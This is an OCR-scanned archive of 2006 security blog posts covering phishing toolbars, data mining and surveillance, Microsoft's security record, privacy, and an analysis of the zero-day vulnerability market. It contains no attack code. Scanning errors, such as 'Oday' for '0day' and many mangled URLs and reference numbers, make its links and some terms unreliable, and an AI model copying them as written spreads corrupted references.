11. "[17]Look who’s gonna cash for evaluating the maliciousness of the Web?" Crawling 
for malware and evaluating the maliciousness of the Web with automated patrol for sites 
distribution it is a very hot and feasible topic you can learn more about by reading this post 


12. "[18]Detecting intruders and where to look for" comments and external resources 
related to rootkits and forensics 


13. "[19]A timeframe on the purchased/sold WMF vulnerability" as requested by read- 
ers 


14. "[20]The end of passwords - for sure, but when?" As my first blog post was related 
to passwords security and why bother given their major insecurities, in this post | commented 
Bill Gate’s remarks. | think they don’t know what they are really up to at the bottom line 


15."[21]Smoking emails" Would you pay millions to avoid paying billions and keep a clean 
image? Of course you will! 
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16. "[22]DVD of the weekend - The Lone Gunmen" the first post related to DVDs worth 
watching over the weekend 


17. "[23]How to win 10,000 bucks until the end of March?" Find a critical, as defined by 
Microsoft’s security bulletins, vulnerability, participate in the [24]market for software vulner- 
abilities - the future Obay, and sell it to iDefense for 10,000 bucks, but what about the social 
outcome out of the process, if any? 


18. "[25]Chinese Internet Censorship efforts and the outbreak" recent events related to 
the Chinese efforts to monitor and censor the web, the the "West’s’"reactions. | did quite a lot 
of quality posts on the topic during January and February mainly because | feel that the higher 
the publicity for the problem, the higher the pressure towards starting talks on the future of 
these efforts 


19. "[26]Master of the Infected Puppets" comments on botnets communication provoked out 
of a nice [27]research | came across to 


20. "[28]Give it back!" Mixed signals from the CIA, DIA and the Do} on secrecy 


21. "[29]One bite only, at least so far!" a brief coverage of the OS X trojan and the Inq- 
Tana worm 
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22. "[30]DVD of the Weekend - The Outer Limits - Sex And Science Fiction Collection" 
weekend two, second DVD 


23. "[31]Get the chance to crack unbroken Nazi Enigma ciphers" another distributed 
concept this time cracking unbroken Nazi messages 


Technorati tags : 


[32]Security, [33]Information Security 


. http: //photos1. blogger. com/blogger/1933/1779/1600/Mind/20blowing Nicholas/20Cann.1. jpg 


. http: //ddanchev. blogspot .com/2006/01/ januarys-security-streams.htm 


ttp://ddanchev. blogspot .com/2006/02/suri-pluma-satellite- image-processing .htm 


1 
2 
3. 
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6 
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ttp://ddanchev. blogspot .com/2006/02/what- search-engines-know-or-may-find. htm 


http: //ddanchev. blogspot .com/2006/02/current-state-of-ip-spoofing. htm 


_ het: //Adanchev blogspot. con/2006/02/nacktivisn- tensions heal 

_ http: //adanchev blogspot .con/2006/02/security-avareness-posters tal 

10. 
12. 
13, 
14. 


15. http://maps. google.com/maps?q=Albuquerque , +NM&t=k&amp ; amp ; amp ; amp; amp ; hl=en&11=35. 048845 , -106.575813ksp 


16. http: //ddanchev.blogspot .com/2006/02/recent-malware-developments.htm 

17. 
18. 
19. 

20. 


. http: //ddanchev. blogspot .com/2006/02/smoking-emails.htm 


22. http://ddanchev. blogspot .com/2006/02/dvd- of-weekend-lone- gunmen. htm 


. http: //ddanchev. blogspot .com/2006/02/how-to-win- 10000-bucks-until-end-of .htm 


N 
H 


. http: //ddanchev. blogspot .com/2005/12/Obay-how-realistic-is-market-for.htm 


. http: //ddanchev. blogspot . com/2006/02/chinese-internet-censorship-efforts.htm 
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30. http://ddanchev. blogspot . com/2006/02/dvd-of-weekend-outer-limits-sex-and.htm 
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2.3.3 Anti Phishing toolbars - can you trust them? (2006-03-06 16:04) 


A lot of recent [1]phishing events occured, and what should be mentioned is their constant 
ambitions towards increasing the number of trust points between end users and the mirror 
version of the original site. The use of SSL and the ease of obtaining a valid certificate for 
to-be fraudelent domain is a faily simple practice. Phishing is so much more than this, and it 
even has to do with [2]buying Oday [3]vulnerabilities to keep itself competitive. 


How should phishing be fought? Educating the end user not to trust that he/she’s on 
Amazon.com, when he just typed it, or enforcing a technological solution to the problem of 
digital social engineering and trust building? As far as trends are concerned, according to the 
[4]AntiPhishingGroup’s latest report : 


¢ Number of unique phishing reports received in December: 15244 

¢ Number of unique phishing sites received in December: 7197 

¢ Number of brands hijacked by phishing campaigns in December: 121 

¢ Number of brands comprising the top 80 % of phishing campaigns in December: 7 
* Country hosting the most phishing websites in December: United States 

* Contain some form of target name in URL: 51 % 

¢ No hostname just IP address: 32 % 

¢ Percentage of sites not using port 80: 7 % 

¢ Average time online for site: 5.3 days 

¢ Longest time online for site: 31 days 


In case you haven't came across to this research "[5]Do Security Toolbars Actually Prevent 
Phishing Attacks?" you'll find that it has very good points and actual evidence. Antiphishing 
filters and toolbars protection are gaining popularity, and many popular companies are 
fighting for market share of the end users’ 
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desktop, but keep in mind that : 


"We conducted two user studies of three security toolbars and other browser security in- 
dicators and found them all ineffective at preventing phishing attacks. Even though subjects 
were asked to pay attention to the toolbar, many failed to look at it; others disregarded or 
explained away the toolbars’ warnings if the content of web pages looked legitimate. We 
found that many subjects do not understand phishing attacks or realize how sophisticated 
such attacks can be." 


The topic of phishing and fighting the problem has been again greatly extended by the 
researcher [6]Min Xu, while writing the thesis "[7]Fighting Phishing at the User Interface" and 
introducing a solution that measures a site’s reputation and trustfulness. While, this is among 
the simplest ways Google uses to while assigning PageRank’s, | find this a common sense 
warning. Still, with the constant flood of Web 2.0 companies, does it matter? :) Check out 
some screenshots from this outstanding thesis, and get the point : 


Localizing the attacks, taking advantage of the momentum, or a software vulnerability 
within a popular browser or site itself, as well as taking advantage of malware, are among 
the most common practices these days. Moreover, | feel that fighting phishing the wrong 
way could [8]Jerode the end user’s trust in the Web on the other hand, so do your homework 
on the social impact on anything you do. [9]NetCraft’s Anti Phishing toolbar, whatsoever, is 
my favorite combination of them all, still, awareness and lack of naivety when it comes to 
transactions or authentication is the perfect tool, what about yours? 


Some resources worth mentioning are : 


[10]Candid’s [11]“Phishing in the middle of the stream” Today’s threats to online bank- 
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[12]Know your Enemy : Phishing 
[13]Phishing attacks and countermeasures 
[14]The Phishing Guide 

[15]Distributed Phishing Attacks 
[16]Phishiest Countries 

[17]MailFrontier Phishing IQ Test 


[18]Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures 


Technorati tags : 


[19]Security, [20]Phishing, [21]Toolbar, [22]AntiPhishing Group 


ttp://isc.sans.org/diary.php?storyid=1118 


. http: //ddanchev.blogspot .com/2006/01/was-wmf-vulnerability-purchased-for.htm 


ttp://ddanchev.blogspot.com/2005/12/0bay-how-realistic-is-market-for.htm 


. http://www.antiphishing. org/reports/apwg_report_DEC2005_FINAL.pdf 


ttp://groups.csail.mit.edu/uid/projects/phishing/chi-security-toolbar . pdf 


ttp://www.ece.umd.edu/~minwu/ 


. http://groups.csail.mit.edu/uid/projects/phishing/proposal . pdf 
. http: //ddanchev.blogspot .com/2006/01/hidden-internet-economy.htm 
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10. http: //vsu.sueest ch/ dublin] 

_hvtp://uws trojan. ch/ paper /ThreatsTofnineBonking Candid, Wosest. pil 
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ttp://www.cert-in. org.in/knowledgebase/whitepapers/ciwp- 2005-03. pdf 
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. http://survey.mailfrontier.com/survey/quiztest.htm 
. http://www. antiphishing. org/Phishing-dhs-report. pdf 
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2.3.4 Data mining, terrorism and security (2006-03-06 19:53) 


[1]l’ve been actively building awareness on what used to feel like an unpopular belief only - 
[2]Cyberterrorism, and also covered some [3]recent events related to Cyberterrorism in some 
of my previous posts. 


Last week, The NYTimes wrote about "[4]Taking Spying to Higher Level, Agencies Look 
for More Ways to Mine Data", and | feel that avoiding the mainstream media for the sake of 
keeping it objective is quite useful sometimes. From the article : 


"On the wish list, according to several venture capitalists who met with the Officials, 
were an array of technologies that underlie the fierce debate over the Bush administration’s 
anti-terrorist eavesdropping program: computerized systems that reveal connections between 
seemingly innocuous and unrelated pieces of information. The tools they were looking for are 
new, but their application would fall under the well-established practice of data mining: using 
mathematical and statistical techniques to scan for hidden relationships in streams of digital 
data or large databases." 


Interest in harnessing the power of data mining given the enormous flow of information 
from different parties would never cease to exist. What’s more to note in this case, is the 
[5]Able Danger scenario as a key indicator for usefulness of outdated information, given any 
has been there at the first place. Conspiracy theorists would logically conclude that the need 
for evidence of the power of data mining for tracking terrorists would inevitably fuel more 
investments in this area. So true, and here’s a recent event to keep the discussing going - 
"[6]Suit airs Able Danger claims: Two operatives in secret program say their lawyers were 
barred at hearings" 


While on one hand wars are getting waged with the idea to eradicate terrorist deep from its 
roots, and sort of building "local presence" thus improving assets allocation and intelligence 
gathering, | feel the fact that a reliable communication channel could be estalibshed by a 
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terrorist network over the Net is already gaining a lot of necessary attention. However, TIA’s 
ambitions have always been desperately megalomaniac, what about some marginal thinking 
in here folks, you cannot absorb all the info and make sense out of it, and who says it has to 
be all of it at the first place?! 


[7]The Total Information Awareness program was prone to be abused in one way or an- 
other, like pretty much any data mining system from my point of view. And while it’s 
supposidely down due to budget deficits and privacy violations outbreak, government legis- 
lation and ensuring [8]key networks remain wiretaps-ready seems to be a valuable asset for 
any future data mining projects. [9]TIA is still up and running folks, or even if it’s not using the 
same name, the concept is still in between the lines of [10]DHS’s budget for 2006 and would 
always be, and with the majority of corporate sector’s participants are [1l]opening up their 
networks to comply with "legal requirements", the lines between privacy and the war against 
terrorism, and what to exchange for what, seems to be getting even more shady these days. 


In my previous posts, | also mentioned about the power of the [12]Starlight project as 
existing initiative to data mine data from different and media-rich sources alltogether, and 
most importantly, visualize the output. If you fear BigBrother, don’t fear the Eye, but fear the 
Eyeglasses :) 


More resources on Data Mining and Terrorism : 


[13]Data Mining : An Overview 

[14]Data Mining and Homeland Security : An Overview (updated January 27, 2006) 
[15]Using data mining techniques for detecting terror-related web activities 
[16]Data mining and surveillance in the post-9.11 environment 


[17]The Dark Web Portal: Collecting and Analyzing the Presence of Domestic and Inter- 
national Terrorist Groups on the Web 
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[18]Workshop on Data Mining for Counter Terrorism and Security 

[19]TRAKS: Terrorist Related Assessment using Knowledge Similarity 

[20]The Multi-State Anti-Terrorism Information Exchange (MATRIX) 

[21]A Knowledge Discovery Approach to Addressing the Threats of Terrorism - [22]wO0Ot 
[23]Gyre’s Data Mining section 

[24]Eyeballing Total Information Awareness 

[25]Able Danger blog 

[26]EPIC’s TIA section 


[27]EFF’s TIA section 


Technorati tags : [28]Security, [29]Terrorism, [30]Cyberterrorism, [31]Data Mining, [32]TIA 
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25. http://www.abledangerblog.com/ 

26. http://www.epic.org/privacy/profiling/tia/ 
27. http://www.eff.org/Privacy/TIA/ 

28. 

29. 
30. 

31. http://technorati.com/tag/Data+Mining 
32. http://technorati.com/tag/TIA 


2.3.5 5 things Microsoft can do to secure the Internet, and why it wouldn’t? 
(2006-03-06 20:21) 


[1]IlIn my previous post on Internet security, | was just scratching the surface of "[2]How to 
secure the Internet", and emphasized that plain text communications, insecure by design, and 
our [3]inability to measure the costs of cybercrime, are among the things to keep in mind. 


Now, If | were asked about [4]monocultures, "ship it now, patch it later" attitudes or 
slow reactive approaches, | would quickly ask is it Microsoft you’re talking about? It’s a 
common weakness to blame the most popular or richest companies before rethinking the 
situation, or even worse, waiting for someone else to secure you, instead of you trying to 
figure out how to achieve the balance. Is [5]Linux, [6Jor, [7]OS X more secure than Microsoft’s 
Windows, or they are just not popular enough to achieve the scale of vulnerabilities, even 
interest in exploiting their weaknesses? 


Important questions arise as always : 


- Are Microsoft’s products insecure by default, or what is insecure in this case? 


- Should Microsoft’s number of known vulnerabilities act as a benchmark for commitment 
towards security, quality of the software, or should this be totally excluded given the tempting 
target Microsoft’s products really are? 


- Should a vendor be held liable for not releasing a patch in a timely fashion, and what 


are the acceptable timeframes, given how quickly malware authors take advantage, and 
"worm the vulnerability"? 
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These and many other points led me to the idea of brainstorming on what Microsoft 
could do to secure the Internet as a whole, and contribute to the social welfare of the society(a 
[8] $100 laptop powered by a hand crank, is so much better than a [9]smartphone, given it’s 
education, and not entertainment you're looking for! ). This is not an anti-microsoft oriented 
post, they’ve got enough [10]Janti-trust legislations and Vista issues to deal with, yet, it’s 
a summary of my thoughts while going through Slashdot’s chat with [11]Mike Nash VP of 
security, and some Microsoft’s [12]comments on today’s state of the [13]market for software 
vulnerabilities. 


1. Think twice before reinventing the security industry 


What is the first thing that comes across your mind when you picture Microsoft as a se- 
curity vendor? A worst case scenario for the Internet as a whole? Just kidding, but still, with 
such a powerful brand, BETA products, and their legal monopoly from my point of view, is quite 
a good foundation besides [14]constant [15]Jacquisitions. Microsoft is a software company, 
software innovation is among their core competencies. Yet, today’s fast growing information 
security market opens up many more profitable opportunities. Though, I’d rather they stick 
to their current OEM licensing agreements by the time they actually come up with something 
truly unique. Acquiring companies indeed improves competitiveness, but is it just me seeing 
the irony of entering the security industry without first dealing with the idea internally? The 
introduction of a [16]OS build-in firewall, and bi-directional and fully working with IPSec for 
Vista would immediately provide Microsoft with a great opportunity to start serving certain 
market segments, while it would leave them in experimental mode while MS is gaining the 
experience. 


Why it wouldn’t? 


Because the information security market is growing so steadily, that if Microsoft doesn’t 
take a piece of the pie, it would be a totally flawed business logic. And they want to do it as 
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independently, thus more profitably, as possible. The recent [17]FBI’s 2005 Computer Crime 
Survey indicated that the majority of security dollars are spent on antivirus, antispyware, and 
perimeter based security solutions, no one would miss that opportunity. While you can acquire 
competitive advantage, and actually buy yourself an anti virus vendor, you cannot do the same 
with core competencies, moreover, | once said "less branding, but higher preferences", and 
you might end up making the right decision for the time being. Moreover, to operate in today’s 
anti virus market you need a brand name and if you don’t have it, there’s a great chance you 
wouldn’t be able to gain any market share, of course if you you don’t somehow capitalize on 
a niche, and introduce innovative competitive features. The rest is all about OEM agreements 
and licensing technologies or the opportunity to provide a service, still, it’s Microsoft’s brand 
and market development practices to worry about. [18]Passport, [19]Trustworthy Computing, 
[20]InfoCard it’s all under Microsoft’s Brand umbrella. 


2. Become accountable, first, in front of itself, than, in front of the its stakeholders 


What is accountability in this case anyway? Releasing a patch given a vulnerability is 
known within a predefined timeframe? Set, report and improve its own benchmark on a fast 
response towards a security threat? Overall commitment as a whole? You cannot simply say 
“hold on” when the entire world is waiting for you to release a patch, any excuse in such a 
situation should be considered as lack of responsibility. And given that no vendor has been 
held liable for not releasing a patch in a timely manner, why would they bother to be the 
benchmark? | think the problem isn’t the lack of resources, but understanding the importance 
of it. Microsoft is so huge and powerful that’s its clumsiness is in direct proportion with this 
fact, isn’t it. Can [21]Elephants Indeed Dance in this case? Microsoft’s VP of Security [22]Mike 
Nash, made a lot of comments for a [23]Slashdot interview that made me an impression, such 
as: 


“Four years ago, | used to have to have frequent conversations with teams who would 
tell me that they couldn’t go through the security review process because they had competi- 
tive pressures or had made a commitment to partners to ship at a certain time.” - | can argue 
that nothing has changed since then, can you? 


Why it wouldn’t? 
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Mainly because of the actual commitment, though | feel Microsoft could evolve if it man- 
ages to find the balance between being a software company with ambitions in the security 
industry. First, the clear benefits should be understood, and they obviously aren’t. | greatly 
feel that until a customer, or a legal party doesn’t start questioning various practices, this 
self-regulation is not getting us anywhere. Gratefully, the are independent researchers out 
there that have a point way faster than the vendor itself. | think exchanging information in 
a way that satisfies both parties would be the best thing to do. Employees training without 
successful evaluation of the progress is useless, and while seeking accountability from a 
programmer has been greatly discussed, | feel that outsourcing the auditing is always an 
option worth keeping in mind. Would confidentiality of the ultra-secret Microsoft’s code be 
breached? | doubt so given they implement close activities monitoring and the Manhattan 
project style operations and cooperation between teams. 


Don’t get me wrong, Microsoft’s software will always be blamed for being insecure, but 
instead | feel its defacto position as an OS turns it into an exciting daily research topic, 
whereas its anti-trust compliance practices such as sharing technical details so that competi- 
tors could - puts them in a very unfavourable $279.83B [24]market capitalization position. 
Security shouldn’t be something to live with as if it’s normal, instead it should be provoked 
by means of active testing and proactive solutions. | feel what they are missing is a legal 
incentive to promptly comply with patch releases, while on the other hand can you picture 
the outcome of a minor tax deduction in case a milestone in the release of proactive security 
vulnerabilities is reached, and watch them securing! 


3. Reach the proactive level, and avoid the reactive, in respect to software vulnerabili- 
ties 


Have you even imagined Microsoft releasing proactive patches to fix Oday vulnerabilities 
it has managed to find out though third-party code auditing practices, or within its internal 
quality assurance departments? Sounds too good to be true, but reaching the proactive 
level is an important step, so hold your breath, the did it with [25]Vista already! Still, their 
practices with dealing with the reactive response are questionable, and as it often happens, 
the window of opportunity due to their efforts to testing and localizing the patches for all their 
customers(the entire world) is causing windows of opportunities that | could argue drive the 
security industry. 
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Why it wouldn’t? 


Resources and commitment, though the first can be successfully outsourced. What | 
greatly feel the company is missing is a clear strategy towards understanding the benefits, 
and eventually the commitment to do it. Microsoft isn’t insanely obsessed with the idea to 
provide bugs free software, but features rich one. And the way MSN is not going to get more 
allocated budget compared to MS Office, it’s going to take a while by the time they realize 
the importance and key role they play as being on the majority of PC and servers worldwide. 
Some [26]comments again : 


"| often get asked the question, "who has been fired for shipping insecure code at Mi- 
crosoft?" My usual answer here is that we are still learning a lot about security at Microsoft 
and that most of the security issues that we deal with don’t come as a result of carelessness 
or disregard for the process, but rather new vectors of attack that we didn’t understand at the 
time." 


4. Introduce an internal security oriented culture, or better utilize its workforce in re- 
spect to security 


[27]Google’s 70/20/10 rule is an example, and while Microsoft tends to position itself as 
THE software company, to some it may be competing with other major software vendors, or 
the Open Source threat, it actually competes on [28]IQ basis. Flame them, talk whatever you 
want, they are still able to attract the smartest people on Earth to work for them. My point is, 
that introducing a Google style culture, where engineers and anyone from their employees 
spend 10 % of their time on personal projects, this time towards security, it would inevitable 
make an impact on finding the balance between usability and security on any of its products. 
Devoting any percentage of work time towards security related projects and initiatives would. 


301 


Why it wouldn’t? 


They pretend they have their own corporate citizenship methods, and moreover, [29]they 
hate Google with a reason. Or is it about the culture, spending time on security/hacking cons 
to find out that’s driving the industry, or basically stop shipping products with the majority of 
features turned on by default with the idea to "show off" their features? 


5. Rethink its position in the security vulnerabilities market 


Would this mean there would be more monopolistic sentiments? I’m just kiddin’ of course 
though it’s still questionable. Would a Microsoft’s initiative to recruit outstanding vulnerability 
researchers and actually purchase their research have any effect at all? It would definitely 
help them | cannot actually imagine Microsoft paying for Oday IE vulnerabilities, but | can 
literally see them catching up with week delay on the WMF vulnerability. But the usefulness 
and the potential of this approach are enormous, and the intelligence gathered will provide 
them with unique business development opportunities, given they actually take advantage of 
them. 


Microsoft has stated numerous time that it doesn’t agree with the practice of buying se- 
curity vulnerabilities, and while | also don’t agree that commercializing the current state of 
the process of discovering, exploiting, and patching is the smartest thing to do, picture a 
$250k bounty for information leading to the arrest of virus writers being spent on secure code 
auditing, or push/pull software vulnerabilities approach with reputable researchers only - it 
would make a change for sure. 


Why it wouldn’t? 
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Because the biggest problem of a 800 pound gorilla is its EGO with capital letters. We 
are not interested in pulling intelligence from you, we are interested in pushing you the final 
results branded with Microsoft’s logo. Is it profitable? It is. Is it realistic in today’s collective 
intelligence dominated Web? It isn’t, and the whole concept has to go beyond Live.com from 
my point of view. Until, then, let’s still say a big thanks for playing such a vital role in our 
society’s progress, but no one seems to tolerate the security trade-offs anymore, that’s a fact. 


To conclude, as I’ve said | think it isn’t the lack of resources, but understanding the im- 
portance of the issue. What do you think, what else can Microsoft do, and why it wouldn’t? :) 
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2.3.6 The Future of Privacy = don’t over-empower the watchers! (2006-03-07 16:45) 


[1] blog a lot about privacy, anonymity and censorship, mainly because | feel not just 
concerned, but obliged to build awareness on the big picture the way | see it. Moreover, | 
find these interrelated and excluding any of these would result in missing the big picture, 
at least from my point of view. Some posts | did, worth mentioning are : "[2]Anonymity or 
Privacy on the Internet?", "[3]China - the biggest black spot on the Internet’s map", "[4]2006 
= 1984?", "[5]Still worry about your search history and BigBrother?", "[6]The Feds, Google, 
MSN’s reaction, and how you got "bigbrothered?", "[7]Twisted Reality", "[8]Chinese Internet 
Censorship efforts and the outbreak", and the most recent one, "[9]Data mining, terrorism 
and security”. 


Yesterday, | read a very nice essay by Bruce Schneier "[10]The Future of Privacy" and 
while | feel it has been written for the general public to understand, you can still update 
yourself on some of the current trends he’s highlighting, mostly the digital storage of our life 
activities, and how possible it really is. 


Some comments that made me an impression though : 


"The typical person uses 500 cell phone minutes a month; that translates to 5 gigabytes a 
year to save it all. My iPod can store 12 times that data. A "life recorder" you can wear on 
your lapel that constantly records is still a few generations off: 200 gigabytes/year for audio 
and 700 gigabytes/year for video." - scary stuff, but so true! 


"Today, personal information about you is not yours; it’s owned by the collector." - if 
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you were to question the practices of each and every "collector" you wouldn’t be able to 
properly function in the 21st century. 


"The city of Baltimore uses aerial photography to surveil every house, looking for build- 
ing permit violations." - typical Columbian style, still applicable in here. 


"IN some ways, this tidal wave of data is the pollution problem of the information age. 
All information processes produce it. If we ignore the problem, it will stay around forever. 
And the only way to successfully deal with it isto pass laws regulating its generation, use and 
eventual disposal." 


| agree on regulation, given someone follows and it’s actually implemented, still, | feel 
it’s all about balancing the powers of the public and the rulling parties. The more a govern- 
ment is empowered to invade privacy in one way or another, the higher the risk of them 
abusing their power, or even worse, having their communications infrastructure wiretap-ready 
for third parties. 


UPDATE - this post recently appeared at LinuxSecurity.com - [11]The Future of Privacy = 
don’t over-empower the watchers! 
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2.3.7 Where’s my Oday, please? (2006-03-07 21:22) 


A [1]site | was recently monitoring disappeared these days, so | feel it’s about time | blog on 
this case. | have been talking about the [2]emerging market for software vulnerabilities for 
quite some time, and it’s quite a success to come across that the concept has been happening 
right there in front of us. Check out the screenshots. The International Exploits Shop | came 
across to looks like this : 


[3]lt appears to be down now, while it has simply changed its location to somewhere 
else. Google no longer has it cached, and the the only info on this wisely registered .in domain, 
can be found at [4]Koffix Blocker’s site. 


A lot of people underestimate the power of the over-the-counter(OTC), market for Oday 
security vulnerabilities. Given that there isn’t any vulnerabilities auction in place that [5]would 
provide a researcher with multiple proposals, and the buyers with a much greater choice 
or even social networking with the idea to possibly attract skilled HR, the seller is making 
personal propositions with the idea to get higher exposure from the site’s visitors. Whoever is 
buying the exploit and whatever happens with it doesn’t seem to bother the seller in this case. 


As there’s been already emerging competition between different [6]infomediaries that 
purchase vulnerabilities information and pay the researchers, researchers themselves are 
getting more and more interested in hearing from "multiple parties". Turning vulnerability 
research, and its actual findings into an IP, and offering financial incentives is tricky, and no 
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pioneers are needed in here! 


There’s been a lot of active discussion among friends, and over the Net. | recently came across 
a great and very recent research entitled "[7]Vulnerability markets - what is the economic 
value of a zero-day exploit?", by Rainer Boehme, that’s worth the read. Basically, it tries to 
list all the market models and possible participants, such as : 


Bug challenges 


- Bug challenges are the simplest and oldest form of vulnerability markets, where the 
producer offers a monetary reward for reported bugs. There are some real-world examples 
for bug challenges. Most widely known is Donald E. Knuth’s reward of initially 1.28 USD for 
each bug in his TEX typesetting system, which grows exponentially with the number of years 
the program is in use. Other examples include the RSA factoring challenge, or the shady SDMI 
challenge on digital audio watermarking 


Bug auctions 


-Bug auctions are theoretical framework for essentially the same concept as bug 

challenges. Andy Ozment [9] first formulated bug challenges in the terms of auction theory, 
in particular as a reverse Dutch auction, or an open first-price ascending auction. This allowed 
him to draw on a huge body of literature and thus add a number of eciency enhancements to 
the original concept. However, the existence of this market type still depends on the initiative 
of the vendor 


Vulnerability brokers 


-Vulnerability brokers are often referred to as “vulnerability sharing circles”. These clubs 
are 

built around independent organizations (mostly private companies) who oer money for new 
vulnerability reports, which they circulate within a closed group of subscribers to their security 
alert service. In the standard model, only good guys are allowed to join the club 
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-[8]Cyber Insurance 

Cyber-insurance is among the oldest proposals for market mechanisms to overcome the 
security market failure. The logic that cures the market failure goes as follows: end users 
demand insurance against financial losses from information security breaches and insurance 
companies sell this kind of coverage after a security audit. The premium is assumed to be 
adjusted by the individual risk, which depends on the IT systems in use and the security 
mechanisms in place. 


Let’s try define the market’s participants, their expectations and value added through 
their actions, if any, of course. 


Buyers 


-[9]malicious (E-criminals, malware authors, competitors, political organization/fraction 
etc.) 


-third party, end users, private detectives, military, intelligence personnel 


-vendors (either through informediary, or directly themselves, which hasn’t actually hap- 
pened so far) 


Sellers 
-reputable 
-newly born 
-questionable 


-does it matter at the bottom line? 
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Intermediaries 
-[10]iDefense 


-[11]ZeroDaylnitiative-[12]Digital Armaments 


Society 


-Internet 


-CERT model - totally out of the game these days? 


As iDefense simply had to restore their position in this emerging market developed mainly by 
them, an offer for [13] $10,000 was made for a critical vulnerability as defined by Microsoft. | 


mean, I’m sort of missing the point in here. Obviously, they are aware of the level of quality 
research that could be sold to them. 


Still | wonder what exactly are they competing with : 


- trying to attract the most talented researchers, instead of having them turn to the dark side? 
| doubt they are that much socially oriented, but still it’s an option? 
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- ensuring the proactive security of its customers through first notifying them, and them 
and then the general public? That doesn’t necessarily secures the Internet, and sort of 
provides the clientele with a false feeling of security, "what if" a (malicious) vulnerability 
researcher doesn’t cooperate with iDefense, and instead sells an Oday to a competitor? Would 
the vendor’s IPS protect against a threat like that too? 


- fighting against the permanent opportunity of another Oday, gaining only a temporary 
momentum advantage? 


- improving the company’s clients list through constant collaboration with leading ven- 
dors while communication a vulnerability in their software products? 


A lot of [14]research [15]publications reasonably argue that the credit for the highest 
social-welware return goes to a CERT type of a model. And while this is truly, accountability 
and providing a researcher with the highest, both tangible, and intangible reward for them is 
what also can make an impact. As a matter of fact, is blackmailing a nasty option that could 
easily become reality in here, or I’m just being paranoid? 


To conclude, this very same shop is definitely among the many other active out there 
for sure, so, sooner or later we would either witness the introduction of a reputable Auction 
based vulnerabilities market model, or continue living with windows of opportunities, clumsy 
vendors, and Oday mom-and-dad shops :) But mind you, turning vuln research into IP and 
paying for it would provide enough motiviation for an underground Obay as well, wouldn’t it? 
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14.03.2006 


OSVDB’s Blog - [16]Where’s my Oday, please? 


OSVDB’s Blog - [17]Vulnerability Markets 


11.03.2006 


LinuxSecurity.com - [18]Where’s my Oday, please? 


FIRST - [19]Where’s my Oday, please? 


10.03.2006 - Sites that picked up the story : 


Net-Security.org - [20]Where’s my Oday, please? 

MalwareHelp.org- [21]The International Exploits Shop: Where’s my Oday, please? 
Security.nl - [22]Internationale Exploit Shop levert Odays op bestelling 
WhiteDust.net - [23]Where’s my Oday, please? 

Reseaux-Telecoms.net - [24]Danchev sur l’Achat de failles 


Informit Network - [25]0-Days for Sale 


09.03.2006 - Two nice articles related to the issue appeared yesterday as well, "[26]Black 
market thrives on vulnerability trading", from the article : 
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"Security giant Symantec claims that anonymous collusion between hackers and crimi- 
nals is creating a thriving black market for vulnerability trading. As criminals have woken up 
to the massive reach afforded to their activities thanks to the Internet, hackers too are now 
able to avoid risking prison sentences by simply selling on their findings. Graeme Pinkney, 
a manager at Symantec for trend analysis, told us: ‘People have suddenly realised that 
there’s now a profit margin and a revenue stream in vulnerabilities... There’s an element of 
anonymous co-operation between the hacker and criminal.” 


and "[27]The value of vulnerabilities", a quote : 


“ There are no guarantees, and therefore | think it would be pretty naive to believe that 
the person reporting the issue is the only one aware of its existence. That in itself is pretty 
frightening if you think about it. " 


Technorati tags: 


[28]Security, [29]Oday, [30]Obay, [31]Vulnerabilities, [32]Exploits, [33]iDefense, [34]Ze- 
roDaylnitiative, [35]Digital Armaments 


. http: //www.xshop.in/ 


ttp://ddanchev. blogspot .com/2005/12/0bay-how-realistic-is-market-for.htm 


ttp://photos1.blogger. com/blogger/1933/1779/1600/International_Exploits_Shop.1.jpg 


. http: //koffix.com/research/sites/xshop.in.htm 


1 
2 
3 
4 
5. http: //photos1. blogger. com/blogger/1933/1779/1600/International_Exploits_Shop/20-%20Products2. jpg 
6 
7 
8 
9 


ttp://photos1.blogger.com/blogger/1933/1779/1600/International_Exploits_Shop/20-%20Products1. jpg 


. http: //events.ccc.de/congress/2005/fahrplan/attachments/542-Boehme2005_22C3_VulnerabilityMarkets .pd 
ttp://infosecon.net/workshop/pdf/15.pd 


ttp://ddanchev. blogspot .com/2006/01/was-wmf-vulnerability-purchased-for.htm 


: .CCC. = . . ili pdf 
: ffi : . pdt 
10. http: //www.idefense.com/ 

11. http://www.zerodayinitiative.com/ 
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12. http://www.digitalarmaments.com/ 


ttp://ddanchev. blogspot .com/2006/02/how-to-win- 10000-bucks-until-end-of .htm 


14. bttp://www.dtc.umn.edu/weis2004/kannan-telang.pdf 


ttp://mansci. pubs. informs .org/e_companion_pages/May_05_EC/Kanan_Telang EC. pdf 


16. http://www. osvdb.org/blog/?p=101 
ttp://www.osvdb.org/blog/?p=102 
: li ity. i / 


. http://www. linuxsecurity.com/content/view/121889/65 
19. http://www.first .org/newsroom/globalsecurity/9825.htm 


ttp://www.malwarehelp.org/news/article-2886.htm 


ttp://net-security.org/news. php? id=1046 


21 
ttp://www.security.nl/article/13099/1/Internationale_Exploit_Shop_levert_Odays_op_bestelling. htm 


23. http://www.whitedust .net/speaks/2263/ 


ttp://www.reseaux-telecoms .net/actualites/lire-danchev-sur-1-achat-de-failles-12703.html?pid= 


ttp://www.informit .com/discussion/index.asp?postid=f8857a10- 149e-4c50-b7c0- 243a82a8bd47&r1=1 


. http://www. pcpro.co.uk/news/84523/black-market-thrives-on-vulnerability-trading.htm 
27. 
28 


. http://technorati.com/tag/Oba 
. http://technorati.com/tag/Vulnerabilities 
32. http://technorati.com/tag/Exploits 


ttp://technorati.com/tag/iDefense 
34. http://technorati.com/tag/ZeroDayInitiative 
ttp://technorati.com/tag/Digital+Armaments 
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2.3.8 DVD of the Weekend - The Immortals (2006-03-10 14:23) 


[1]The Lawnmower Man : Beyond Cyberspace was among the [2]several [3]other classic 
[4]techno thrillers | was watching and mostly remembering pleasant times from the past. | 
actually got in touch with [5]SFAM from the [6]CyberpunkReview.com, and intend to contribute 
with another point of view to his initiative | highly recommend you to keep an eye on. 


This weekend, | want to recommend you one of the best European film productions ever, 
namely [7]Enki Bilal’s [8]adaptation of his [9]Nikopol Trilogy - [10]The Immortals. 


Here’s an excerpt from a review, and another [11]one : 


"New York City, year 2095. A floating pyramid has emerged in the skies above, inhab- 
ited by ancient Egyptian Gods. They have cast judgment down upon Horus, one of their own. 
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Now he must find a human host body to inhabit, and search for a mate to continue his own 
life. Below, a beautiful young woman with blue hair, blue tears and a power even unknown to 
her, wanders the city in search of her identity. Reality in this world has a whole new meaning 
as bodies, voices and memories converge with Gods, mutants, extra-terrestrials and mortals." 


